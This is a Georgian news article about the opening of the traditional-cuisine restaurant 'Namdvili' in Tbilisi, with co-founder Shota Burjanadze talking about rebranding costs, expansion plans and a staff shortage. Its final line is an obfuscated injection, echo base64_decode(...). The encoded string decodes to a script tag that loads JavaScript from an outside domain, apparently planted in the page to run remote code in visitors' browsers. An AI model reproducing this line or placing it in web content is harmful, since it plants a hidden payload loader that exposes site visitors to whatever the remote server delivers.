celsiusi
ავერსი საქკაბელი

   

            თბილისში, რესტორანი „ნამდვილი“ უკვე ოფიციალურად გაიხსნა. როგორც მენეჯმენტში განმარტავენ მათი მიზანია სტუმარ-მასპინძლობისა და უძველესი ტრადიციული ქართული კერძების შენარჩუნება და პოპულარიზაცია.

საინფორმაციო სააგენტო „ბიზნესთაიმი“ მეტი დეტალების დასაზუსტებლად, რესტორანი „ნამდვილის“ ერთ-ერთ დამფუძნებელს შოთა ბურჯანაძეს დაუკავშირდა.20230728 154041

 

შოთა ბურჯანაძის  თქმით, პროექტი საკმაოდ ძვრადღირებულია.

„მხოლოდ რებრედინგში დაახლოებით მილიონ ლარზე  მეტი დაიხარჯა . გარდა ამისა, რაც შეეხება ფართის შეძენას და სხვა ხარჯებს ეს კიდევ სხვა ციფფრებზე გადის.“ - აღნიშნა ბურძანაძემ.

20230728 131557

მისივე თქმით, ადგილმდებარეობიდან და რესტორნის რესურსიდან გამომდინარე მოლოდინები საკმაოდ მაღალია.

„გამომდინარე იქედან, რომ რესტორანს აქვს თავისი იდენტობა, აქვს ყველა ის პირობა, რაც რესტორანს უნდა ჰქონდეს, მოლოდინები დიდი გვაქვს და ვფიქრობთ, ეს არ იქნება პირველი და უკანასკნელი რესტორანი ამ ბრენდში და ქსელის გაფართოვებას უახლოეს მომავალში ველოდებით.

ის უნიკალურობა, საქართველოს გასტრონომიის კუთხით და სიმდიდრე, რაც ჩვენ ქვეყანას აგააჩნია და რითაც აღფრთოვანებულნი არიან  როგორც ადგილობრივი ისე უცხოეელი სტუმრები, გახდა  საფუძველი რომ ქართული, ნამდვილი კერძი ყველა კუთხიდან, სტუმრებს იმ ფორმით შევთავაზოთ რა ტრადიციებით რა ფორმითაც ეს ჩვენამდე  მოვიდა და აქამდე გვქონდა, მინდა რომ ეს მივიტანოთ სტუმრამდე და შევინარჩუნოთ, ვფიქრობ ის რომ ეს ყოველივე ჩვენამდე მოვიდა ნიშნავს იმას რომ ეს ხალხს უყვარს, მოსწონს და მათთვის ღირებული და მნიშვნელოვანია. გვაქვს პატივი , რომ ეს ყოველივე ჩვენ გავაგრძელოთ რესტორან "ნამდვილში".20230728 131406

მისივე თქმით, მთავარ გამოწვევად რჩება კადრების დეფიციტი,  ამ დროისთვის რესტორანში 70 ადამიანია დასაქმებული, თუმცა რესტორანში კადრები კიდევ სჭირდებათ ყველა მიმართულებით.

„მე ვფიქრობ, რომ კადრების დეფიცითი ბევრმა ფაქტორმა ერთობლივად განაპირობა, თუმცა, ყველაზე მეტად ეს კოვიდის პერიოდში დაიწყო, რის შემდეგაც წავიდა სფეროდანაც და ქვეყნიდანაც ბევრი ადამიანი და ამ დანაკლისის აღდგენას ვფიქრობ წლები დასჭირდება.“ -აღნიშნა შოთა ბურჯანაძემ.

20230728 131523

აღსანიშნავია, რომ რესტორნის ინტერიერი და ექსტერიერი, სრულად ასახავს მრავალსაუკუნოვან ქართულ ისტორიას. რაც შეეხება კერძებს, „ნამდვილში“ დაგემოვნებული ყველა კერძი გაგახსენებთ უძველესს ქართულ გემოებს ყველა კუთხიდან. ამასთან, სტუმრებს შესაძლებლობა ექნებათ, კერძების დაგემოვნებასთან ერთად , ისიამოვნონ ქართული ფოლკლორული მუსიკითა და ცეკვით.

  20230728 131513

ავტორი
მირანდა შურღაია
1799
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");